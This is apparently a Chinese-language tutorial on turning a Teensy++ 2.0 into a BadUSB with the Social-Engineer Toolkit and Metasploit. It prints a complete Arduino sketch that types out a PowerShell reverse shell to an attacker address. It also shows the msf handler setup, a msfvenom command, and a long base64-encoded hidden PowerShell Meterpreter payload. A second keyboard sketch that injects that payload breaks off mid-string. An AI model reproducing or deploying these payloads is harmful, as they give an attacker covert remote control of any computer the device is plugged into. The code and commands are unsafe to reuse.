关于如何制作badusb参考:用Teensy++2.0制作一个简单的关机BadUSB
启动Setoolkit:
setoolkit
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 7.7.5
Codename: 'Blackout'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET).
The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!
Select from the menu:
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Return back to the main menu.
输入1选择社会工程学攻击
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
输入6选择基于Arduino的攻击向量
Select a payload to create the pde file to import into Arduino:
1) Powershell HTTP GET MSF Payload
2) WSCRIPT HTTP GET MSF Payload
3) Powershell based Reverse Shell Payload
4) Internet Explorer/FireFox Beef Jack Payload
5) Go to malicious java site and accept applet Payload
6) Gnome wget Download Payload
7) Binary 2 Teensy Attack (Deploy MSF payloads)
8) SDCard 2 Teensy Attack (Deploy Any EXE)
9) SDCard 2 Teensy Attack (Deploy on OSX)
10) X10 Arduino Sniffer PDE and Libraries
11) X10 Arduino Jammer PDE and Libraries
12) Powershell Direct ShellCode Teensy Attack
13) Peensy Multi Attack Dip Switch + SDCard Attack
14) HID Msbuild compile to memory Shellcode Attack
99) Return to Main Menu
输入3选择生成基于powershell的reverse_tcp攻击向量
[*] INO file created. You can get it under '/root/.set/reportsteensy_2018-03-24 09:24:27.876891.ino'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
[*] If your running into issues with VMWare Fusion and the start menu, uncheck
the 'Enable Key Mapping' under preferences in VMWare
Press {return} to continue.
由于是虚拟机,程序直接把代码输出到了~/.set/reports目录下
parrot]─[~/.set/reports]
└──╼ #ls
'teensy_2018-03-24 09:24:27.876891.ino'
┌─[root@parrot]─[~/.set/reports]
└──╼ #
查看内容:cat teensy_2018-03-24\ 09\:24\:27.876891.ino
//
// Social-Engineer Toolkit Teensy Attack Vector
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
//
// Special thanks to: Irongeek
// You will need to setup a netcat listener MSF cannot handle this payload
//
// 2011-02-28 [email protected]
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
// * Changed from script to interactive powershell execution: Bypass Restricted Powershell Execution Policies
//
#define ascii_println Keyboard.println
void setup() {
delay(10000);
omg("powershell");
delay(1000);
// Here is the payload...
// This is a reverse bind shell through powershell. I need to fix it use the
// bind shell. The reverse bind shell code is cleaner though.
// I bet we could use the dip switches to configure the IP addy or port...
ascii_println("function cleanup {");
ascii_println("if ($client.Connected -eq $true) {$client.Close()}");
ascii_println("if ($process.ExitCode -ne $null) {$process.Close()}");
ascii_println("exit}");
// Setup 192.168.1.1 HERE
ascii_println("$address = '192.168.1.1'");
// Setup PORT HERE
ascii_println("$port = '4444'");
ascii_println("$client = New-Object system.net.sockets.tcpclient");
ascii_println("$client.connect($address,$port)");
ascii_println("$stream = $client.GetStream()");
ascii_println("$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize");
ascii_println("$process = New-Object System.Diagnostics.Process");
ascii_println("$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'");
ascii_println("$process.StartInfo.RedirectStandardInput = 1");
ascii_println("$process.StartInfo.RedirectStandardOutput = 1");
ascii_println("$process.StartInfo.UseShellExecute = 0");
ascii_println("$process.Start()");
ascii_println("$inputstream = $process.StandardInput");
ascii_println("$outputstream = $process.StandardOutput");
ascii_println("Start-Sleep 1");
ascii_println("$encoding = new-object System.Text.AsciiEncoding");
ascii_println("while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}");
ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.Length)");
ascii_println("$out = $null; $done = $false; $testing = 0;");
ascii_println("while (-not $done) {");
ascii_println("if ($client.Connected -ne $true) {cleanup}");
ascii_println("$pos = 0; $i = 1");
ascii_println("while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {");
ascii_println("$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)");
ascii_println("$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}");
ascii_println("if ($pos -gt 0) {");
ascii_println("$string = $encoding.GetString($networkbuffer,0,$pos)");
ascii_println("$inputstream.write($string)");
ascii_println("start-sleep 1");
ascii_println("if ($process.ExitCode -ne $null) {cleanup}");
ascii_println("else {");
ascii_println("$out = $encoding.GetString($outputstream.Read())");
ascii_println("while($outputstream.Peek() -ne -1){");
ascii_println("$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}");
ascii_println("$stream.Write($encoding.GetBytes($out),0,$out.length)");
ascii_println("$out = $null");
ascii_println("$string = $null}} else {cleanup}}");
ascii_println(""); //Enter to start execution
}
void loop() {
}
void omg(char *SomeCommand)
{
Keyboard.set_modifier(128);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(1500);
ascii_println(SomeCommand);
}
在ascii_println("$address = '192.168.1.1'");这里设置回连地址
修改之后把代码放入Arduino然后烧录进teensy2.0++
在Parrot中启动msf handler进行监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.59.128
LHOST => 192.168.59.128
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.59.128:4444
把teensy 2.0 ++插入电脑
自动打开了powershell然后输入攻击向量
右边的监听器收到了shell
这是普通的reverse_tcp cmd shell,如果要生成meterpreter shell可以在上面选择1powershell HTTP GET MSF Payload这个需要把木马放在你的服务器上启动http server供目标机器下载执行
这里用另一种方式去获得Meterpreter shell
首先生成获得meterpreter shell 的cmd命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=4455 -f psh-cmd
生成的payload
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARQBsAFoAdABsAG8AQwBBADcAVgBXAGYAMgAvAGEATwBoAFQAOQB1ADUAUAAyAEgAYQBJAEoASwBZAGwARwBDAFYAQwAyAGIAcABVAG0AUABZAGMAUQBTAEEAcwBVAFMASQBFAEMAUQA1AE8AYgBPAE0ARgBnAFkAdQBZADQALwBOAHIAMgAzAGQAOABOAGsASwAxAFQAdQAvAGUAMgBKADcAMABJAGgARwBQAGYAYQA5ADkANwB6AHIAbgBYAEIARQBuAGsAUwBjAG8AagB4AGIAZABpAFoANgBGADgAZQBmAG4AaQByAEkATQBGAFgAaQBwAGEAagB0AG4AegBwAHAATgBYAGMAbwB2AFMAUQAwAE0ALwBPADQATwBWADMATAByAGUAVQB6ADQAbwAyAGcAUwB0AFYAaABaAGYAWQBoAHAATgByADYANgBxAGkAUgBBAGsAawBzAGYAMwBRAHAAMQBJAEYATQBkAGsAKwBjAEEAbwBpAFQAVgBkACsAYQBvAE0AWgAwAFMAUQA4ADkAdQBIAE8AZgBHAGsAOABrAFgASgBmAFMAcgBVAEcAWAAvAEEANwBHAFMAMgBxADIASgB2AFIAcABSAHoARgBQAG4AcABXAHAATgA3AE8ASQAyAG4ANABLADQAWQBsAFoAcgA2ADgAYQBPAHEAVAA4ADUATAAwADAATAB0AGMANABKAFoAcgBLAG4AdQBMAHAAWgBrAFcAZgBBAFoAVQAzAFgAbABtADUANABlAGUATABkAGIARQBVADEAdABVAFUALwB3AG0AQQBlAHkATQBLAFQAUgBSAGIAbgBRAGoAMgBJAGMAawBEAGIAcwB0AGkAWQB0AEkAbQBmAGMAagAxAFUAZABrAG8AQwBQAEkARABJAFIAawBaAEsAbQBrAC8AbwBmAFYAegBVAFYAaABoADMAQgBQAGUAVAA3AGcAcwBSAGcAWABIAEMAaQBOAFYAOABRAEwAUgBjAGwAagBPAFcAVgB2ADcAVABKADYAZgBCAGUARQBrAG0ANgBKAEwAQQB1AGkAZQBBAHIAbAA0AGcAMQA5AFUAaABjAGEATwBEAEkAWgA2AFIASABnAHEAbgBXAEoAcABzAHMANQA5ADkAMQAwAGgANAA3AGcAVgBWAEgAQwBqADAAUABQAEQAeQBOAHMAcwBYADkAaABKAEcAagBvADYAbwAvAGoAZgBOAEkAbgBRADUAUABSAGgAOABrAC8AdQAzAGwAaQA1AGMAdgBnAG8AeAB1ADAAUgA3ADcAagA5AG0ARwAwAGQAbgBrAE0AQwBZAFEAbgB0AGIAaABNAFQAMwBZAGYAVgBDAEsAZQBhAFUARgBKADIASABKAHgAUQA1AGUAYwAzAGMAaQBJAGYAcABVAG0AYQBTAG8AVAA2AFoAVABKAGIAZABaADAAUAB5AHYAMwBVAHUAWgBMAFYAaABHAFEANQBpAFkARABEAGoAMQBwACsAQgB3AEkAaQBPADMAcgBLAFcAegB2ADUAYQBVAFIAUQBJAGEARQBXAHMAWAA0AFMAWAAxAE0AdABWAG8AegB5AEYATQBBAGsAWQBPADYAUgBVAHkAcwB6AFkARQBwAEsAbQBuAEIAZQBKAGIAaABKAEUAUQB5AHgAUwAwAHYARABKADUANgBsAFoAYgBVAHYAbgBkADEAMAB3AG8AOAA0AGwAQQBIAHIAQQBVAFEAMQBSAEEAbwBQADUAegBNAEUAYwBlAE4ATgBXAEoAVwBtAFEASgA4AEIAegBmAFYAUQBBADkAQQBLADIAUwB6AFAAcQBrAHoAMQAxADIAZQB2AG8ATwBSAG0AcQBWADQAVABqAE8ASwA1ADAARQBpAHMAWABMAEsAeQA3AEIAagBQAGgANQBCAFUAVQB4AFAAUwAyAGgAUgBQAEwARABVAFAAMABSAGIAaQB0AGgAawBuAG8ANABsAHQAbAAyAFUALwAyAEkANAB1AG0AMABLAG8AOQBpAEsAUgBJAFAAKwBJAEwATQA3ADkAdwBWADgAUwBoAG0ASwBSAEIANQBwAFUARgA5AFkAdQA1AGMARwBtAGEAbgBxAHMALwBDAFUATQBXAE0AMABTAGkARQBuAGQAWgBBAEEAOAB5AGsANgBiAHMAeQBWAFkARwBBAEEARgBQAEcAOQBZAEoATABwAEwATgBjAE0AYgBJAEUAawAwAFAASgAyAGcAeQBIAFUASwBBAG4AbgBSADkAVQBnADAAUABpAHEAegArAEgAbAA4AG4ANABxAE4AawBVAGgAaQB6AC8AUgA4AEUAQgB0AHkANwBqAE0AcQA4AE0AcQBKAEIAUQA5AHkAbQBrADAAZgBBAC8AbgBmAHkAbwAzAEMARwBHAHEAaQBBAG4AQQByAFMAcwBKAEMAYgBtAFQAcQBaAEMAegBnAFcAZgAyAG4AaQBVAFMAdgBFAEUAeQBDAEYAOQBJAFMARgAxAFcALwBDAGwAaQBXAFAAeQB0AHUASgBLAEEAYwBCAG8AcgA0AHgAYgBXAGsAWAB3AGoASgB5AEkAdABUAHgAegBRAFUAdABvAFEAMAB0AE8AQwA3ADUAOQBlAHUARgB3ADYAOQBLAC8AdQBaADQAMwBEAEcARgB0AFoAdwBGAHkAWQBxAGYAVgA2AEYAagBkAFIAcQBPAHkAdgBuAFkASABGAGUAbgBXAEgASABuAFQAYwBXAFMAcgBkAGoAKwBmAHUANgBqAFIANgA0AC8AawAyAEUARwBOAE8AMQBwAGMAagBDAHIANwAxAFQAWABkAHUAMAAzAGsAagA3AGIARwAyADcAMgA1ADMAeABUAE4ANwBYADQAZQArAHMASABJAEMAbwBMAHcATQBuAEIANwBwAFQAYwAyAGIAUQA2AHIAWABiAE4AWQB4AGsAMgByAGwAagBTAEgANQBzAFkAcwBWAHUASQBhADMAVABTADYAdABOADkAZABYAE4AdgB5AFkAVABSAGcAdQBCADgAWQA0AFgAMwBwAFAAYQBiAGIAcABwAGcAUABTAHIAeQAxAGQAeABDAHEAegB5ADYAOAAvAFgAVQB3AHEATQA5AGEALwBtADcAVQBNAE4ANABQAEsAdwB0AFUAUQA2AGcAYQAxAFEAYQAyAHkAVwA5AEcAcABrAEEAZABZADQARABEAEYAZAAvAGMAaABKAGQAaABQAGEAdwBpADAALwBZAG8ARwBYAGYANwB0AHQAbgB0ADIAaQBiAHEAMQArAGUAZgByAGYAZABHAEMATAA3ADMAZQBHAFkATwBCADIAVQA2AFgAdAAzADMAWgB2AEIAdQBRAHcAZwAzAFIAcgBIAGkAKwBHAFQAUABSADEAMABBAHEAYwA0AFIARABuAHQAZwBFADEAYgBMADMAaQB3AEEARwArAHMAMQBNAGwAKwAzAGUAVgB6AEcAQwA1AE0AagBFADIAegBzADgAVwBlAEkAYQA3AFMAeQBPAHcAegBXADcALwBwAGwAagBnAGEAcwBmAFkAOQBSAGMANwB5AHoARABhAE0AMAA2AGwAUgBRAG8AMABpAEgAOQBSAEMAbABXACsATABRADcARwBJAFUAcgA2ADIAOQBaAFoAUQBHAFAAdgBlAEgAYgA5AHEAagB3AEIAagBjAHMAMAB2AEQAcQB0ADYAdAB2AE0AQQB3AGoARQAzAEQAdQB2AEgARwBwAGUAMgA3ADIAOAB0ADMAegBTAEUAZABMAEQAbgBxAEcAOABiAGcAVgBTAG8ATAAwAEUAVgBPAE4AaAA2AHgALwBhAHYAMgAzAE0ASQBpAG4AbQBFAEcASwBvAEQARwBtADUAVwBjAHoAWQBWADkANgBxAFEAZABUAGwATQBQAFQAVAB0AGUAbwBBAHMAaQBJAHMATABnACsAbwBFAEwASwBsAE0AdgBZAG8AeAA3AGEAUwBzAC8ATgBGADIANABSAG8ANwBOAGYAUQBxADEAMQA0AGYAaABSAGYAbgBaAGsAYQA1ADgATgA5AFIALwA5AFAAaABzADYAdQBwAHEARABHAEcAbQBuAFMAWgBWAGIAYQBGAEoAbwBsAEQATwA4AHMAWAB0AFIAYgBFAEkARABiAHUANAByAFIAUQBoAHkAOQAvAFAAcgBjAHAAWABPACsAMgA0AFYAegA3AHQAKwBJAEQATgA5ADcAMwBaAFkAVwA4ADkAcgBaAFgAYwBQAGoAYgBYADYASAA5AEcANwBWAFMAagBNAC8AagB4AC8AdwAyADEASAAzAFAALwBzAFAAcABiAFMAQgBiAHoAYQBjADUAUABKAG4AKwBlACsAQwBOAE0ALwB6AHoAegBJAGEAWQBTAFQARgAxAG8ATQBZAHcAYwA3ADcAYgBuAEEAVABnAHAANQBOAEgAVgBmAHkAQQBHACsAQQA5AE8AVAAvAHIAUAA2AHoAYQBSADUAMgAzADQAUwAvAEEAMwA5AGsANgBJAEcATwBRAEoAQQBBAEEAPQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
然后用之前制作简单关机的代码修改一下
把之前输出的关机指令换成上面的payload
#include "Keyboard.h"
/* Init function */
void setup()
{
// Begining the Keyboard stream
Keyboard.begin();
// Wait 500ms
delay(500);
delay(3000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(500);
Keyboard.print("cmd");
delay(1000);
Keyboard.press(KEY_RETURN);
delay(50);
Keyboard.release(KEY_RETURN);
delay(1000);
Keyboard.print("%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEARQBsAFoAdABsAG8AQwBBADcAVgBXAGYAMgAvAGEATwBoAFQAOQB1ADUAUAAyAEgAYQBJAEoASwBZAGwARwBDAFYAQwAyAGIAcABVAG0AUABZAGMAUQBTAEEAcwBVAFMASQBFAEMAUQA1AE8AYgBPAE0ARgBnAFkAdQBZADQALwBOAHIAMgAzAGQAOABOAGsASwAxAFQAdQAvAGUAMgBKADcAMABJAGgARwBQAGYAYQA5ADkANwB6AHIAbgBYAEIARQBuAGsAUwBjAG8AagB4AGIAZABpAFoANgBGADgAZQBmAG4AaQByAEkATQBGAFgAaQBwAGEAagB0AG4AegBwAHAATgBYAGMAbwB2AFMAUQAwAE0ALwBPADQATwBWADMATAByAGUAVQB6ADQAbwAyAGcAUwB0AFYAaABaAGYAWQBoAHAATgByADYANgBxAGkAUgBBAGsAawBzAGYAMwBRAHAAMQBJAEYATQBkAGsAKwBjAEEAbwBpAFQAVgBkACsAYQBvAE0AWgAwAFMAUQA4ADkAdQBIAE8AZgBHAGsAOABrAFgASgBmAFMAcgBVAEcAWAAvAEEANwBHAFMAMgBxADIASgB2AFIAcABSAHoARgBQAG4AcABXAHAATgA3AE8ASQAyAG4ANABLADQAWQBsAFoAcgA2ADgAYQBPAHEAVAA4ADUATAAwADAATAB0AGMANABKAFoAcgBLAG4AdQBMAHAAWgBrAFcAZgBBAFoAVQAzAFgAbABtADUANABlAGUATABkAGIARQBVADEAdABVAFUALwB3AG0AQQBlAHkATQBLAFQAUgBSAGIAbgBRAGoAMgBJAGMAawBEAGIAcwB0AGkAWQB0AEkAbQBmAGMAagAxAFUAZABrAG8AQwBQAEkARABJAFIAawBaAEsAbQBrAC8AbwBmAFYAegBVAFYAaABoADMAQgBQAGUAVAA3AGcAcwBSAGcAWABIAEMAaQBOAFYAOABRAEwAUgBjAGwAagBPAFcAVgB2ADcAVABKADYAZgBCAGUARQBrAG0ANgBKAEwAQQB1AGkAZQBBAHIAbAA0AGcAMQA5AFUAaABjAGEATwBEAEkAWgA2AFIASABnAHEAbgBXAEoAcABzAHMANQA5ADkAMQAwAGgANAA3AGcAVgBWAEgAQwBqADAAUABQAEQAeQBOAHMAcwBYADkAaABKAEcAagBvADYAbwAvAGoAZgBOAEkAbgBRADUAUABSAGgAOABrAC8AdQAzAGwAaQA1AGMAdgBnAG8AeAB1ADAAUgA3ADcAagA5AG0ARwAwAGQAbgBrAE0AQwBZAFEAbgB0AGIAaABNAFQAMwBZAGYAVgBDAEsAZQBhAFUARgBKADIASABKAHgAUQA1AGUAYwAzAGMAaQBJAGYAcABVAG0AYQBTAG8AVAA2AFoAVABKAGIAZABaADAAUAB5AHYAMwBVAHUAWgBMAFYAaABHAFEANQBpAFkARABEAGoAMQBwACsAQgB3AEkAaQBPADMAcgBLAFcAegB2ADUAYQBVAFIAUQBJAGEARQBXAHMAWAA0AFMAWAAxAE0AdABWAG8AegB5AEYATQBBAGsAWQBPADYAUgBVAHkAcwB6AFkARQBwAEsAbQBuAEIAZQBKAGIAaABKAEUAUQB5AHgAUwAwAHYARABKADUANgBsAFoAYgBVAHYAbgBkADEAMAB3AG8AOAA0AGwAQQBIAHIAQQBVAFEAMQBSAEEAbwBQADUAegBNAEUAYwBlAE4ATgBXAEoAVwBtAFEASgA4AEIAegBmAFYAUQBBADkAQQBLADIAUwB6AFAAcQBrAHoAMQAxADIAZQB2AG8ATwBSAG0AcQBWADQAVABqAE8ASwA1ADAARQBpAHMAWABMAEsAeQA3AEIAagBQAGgANQBCAFUAVQB4AFAAUwAyAGgAUgBQAEwARABVAFAAMABSAGIAaQB0AGgAawBuAG8ANABsAHQAbAAyAFUALwAyAEkANAB1AG0AMABLAG8AOQBpAEsAUgBJAFAAKwBJAEwATQA3ADkAdwBWADgAUwBoAG0ASwBSAEIANQBwAFUARgA5AFkAdQA1AGMARwBtAGEAbgBxAHMALwBDAFUATQBXAE0AMABTAGkARQBuAGQAWgBBAEEAOAB5AGsANgBiAHMAeQBWAFkARwBBAEEARgBQAEcAOQBZAEoATABwAEwATgBjAE0AYgBJAEUAawAwAFAASgAyAGcAeQBIAFUASwBBAG4AbgBSADkAVQBnADAAUABpAHEAegArAEgAbAA4AG4ANABxAE4AawBVAGgAaQB6AC8AUgA4AEUAQgB0AHkANwBqAE0AcQA4AE0AcQBKAEIAUQA5AHkAbQBrADAAZgBBAC8AbgBmAHkAbwAzAEMARwBHAHEAaQBBAG4AQQByAFMAcwBKAEMAYgBtAFQAcQBaAEMAegBnAFcAZgAyAG4AaQBVAFMAdgBFAEUAeQBDAEYAOQBJAFMARgAxAFcALwBDAGwAaQBXAFAAeQB0AHUASgBLAEEAYwBCAG8AcgA0AHgAYgBXAGsAWAB3AGoASgB5AEkAdABUAHgAegBRAFUAdABvAFEAMAB0AE8AQwA3ADUAOQBlAHUARgB3ADYAOQBLAC8AdQBaADQAMwBEAEcARgB0AFoAdwBGAHkAWQBxAGYAVgA2AEYAagBkAFIAcQBPAHkAdgBuAFkASABGAGUAbgBXAEgASABuAFQAYwBXAFMAcgBkAGoAKwBmAHUANgBqAFIANgA0AC8AawAyAEUARwBOAE8AMQBwAGMAagBDAHIANwAxAFQAWABkAHUAMAAzAGsAagA3AGIARwAyADcAMgA1ADMAeABUAE4ANwBYADQAZQArAHMASABJAEMAbwBMAHcATQBuAEIANwBwAFQAYwAyAGIAUQA2AHIAWABiAE4AWQB4AGsAMgByAGwAagBTAEgANQBzAFkAcwBWAHUASQBhADMAVABTADYAdABOADkAZABYAE4AdgB5AFkAVABSAGcAdQBCADgAWQA0AFgAMwBwAFAAYQBiAGIAcABwAGcAUABTAHIAeQAxAGQAeABDAHEAegB5ADYAOAAvAFgAVQB3AHEATQA5AGEALwBtADcAVQBNAE4ANABQAEsAdwB0AFUAUQA2AGcAYQAxAFEAYQAyAHkAVwA5AEcAcABrAEEAZABZADQARABEAEYAZAAvAGMAaABKAGQAaABQAGEAdwBpADAALwBZAG8ARwBYAGYANwB0AHQAbgB0ADIAaQBiAHEAMQArAGUAZgByAGYAZABHAEMATAA3ADMAZQBHAFkATwBCADIAVQA2AFgAdAAzADMAWgB2AEIAdQBRAHcAZwAzAFIAcgBIAGkAKwBHAFQAUABSADEAMABBAHEAYwA0AFIARABuAHQAZwBFADEAYgBMADMAaQB3AEEARwArAHMAMQBNAGwAKwAzAGUAVgB6AEcAQwA1AE0AagBFADIAegBzADgAVwBlAEkAYQA3AFMAeQBPAHcAegBXADcALwBwAGwAagBnAGEAcwBmAFkAOQBSAGMANwB5AHoARABhAE0AMAA2AGwAUgBRAG8AMABpAEgAOQBSAEMAbABXACsATABRADcARwBJAFUAcgA2ADIAOQBaAFoAUQBHAFAAdgBlAEgAYgA5AHEAagB3AEIAagBjAHMAMAB2AEQAcQB0ADYAdAB2AE0AQQB3AGoARQAzAEQAdQB2AEgARwBwAGUAMgA3ADIAOAB0ADMAegBTAEUAZABMAEQAbgBxAEcAOABiAGcAVgBTAG8ATAAwAEUAVgBPAE4AaAA2AHgALwBhAHYAMgAzAE0ASQBpAG4AbQBFAEcASwBvAEQARwBtADUAVwBjAHoAWQBWADkANgBxAFEAZABUAGwATQBQAFQAVAB0AGUAbwBBAHMAaQBJAHMATABnACsAbwBFAEwASwBsAE0AdgBZAG8AeAA3AGEAUwBzAC8ATgBGADIANABSAG8ANwBOAGYAUQBxADEAMQA0AGYAaABSAGYAbgBaAGsAYQA1ADgATgA5AFIALwA5AFAAaABzADYAdQBwAHEARABHAEcAbQBuAFMAWgBWAGIAYQBGAEoAbwBsAEQATwA4AHMAWAB0AFIAYgBFAEkARABiAHUANAByAFIAUQBoAHkAOQAvAFAAcgBjAHAAWABPACsAMgA0AFYAegA3AHQAKwBJAEQATgA5ADcAMwBaAFkAVwA4ADkAcgBaAFgAYwBQAGoAYgBYADYASAA5AEcANwBWAFMAagBNAC8AagB4AC8AdwAyADEASAAzAFAALwBzAFAAcABiAFMAQgBiAHoAYQBjADUAUABKAG4AKwBlACsAQwBOAE0ALwB6AHoAegBJAGEAWQBTAFQARgAxAG8ATQBZAHcAYwA3ADcAYgBuAEEAVABnAHAANQBOAEgAVgBmAHkAQQBHACsAQQA5AE8AVAAvAHIAUAA2AHoAYQBSADUAMgAzADQAUwAvAEEAMwA5AGsANgBJAEcATwBRAEoAQQBBAEEAPQAnACcAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0